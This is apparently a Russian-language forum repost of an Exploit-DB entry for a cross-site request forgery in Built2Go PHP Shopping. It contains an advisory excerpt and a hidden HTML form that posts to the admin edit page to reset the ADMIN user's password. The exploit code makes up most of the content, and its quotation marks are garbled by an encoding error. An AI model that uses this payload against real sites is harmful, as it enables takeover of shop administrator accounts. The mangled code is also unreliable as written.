Exploit Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
39013
Проверка EDB
  1. Пройдено
Автор
ATT4CKXT3RR0R1ST
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2014-01-08
Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)
HTML:
source: https://www.securityfocus.com/bid/64735/info

Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.

Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers. 

<form method=â?POSTâ? name=â?form0? action=â? http://www.example.com/adminpanel/edit_admin.phpâ?>
<input type=â?hiddenâ? name=â?useridâ? value=â?ADMINâ?/>
<input type=â?hiddenâ? name=â?passâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?retypepassâ? value=â?12121212?/>
<input type=â?hiddenâ? name=â?addnewâ? value=â?1?/>
<input type=â?hiddenâ? name=â?actionâ? value=â?saveâ?/>
<input type=â?hiddenâ? name=â?newâ? value=â?Submitâ?/>
</form>
 
Источник
www.exploit-db.com

Похожие темы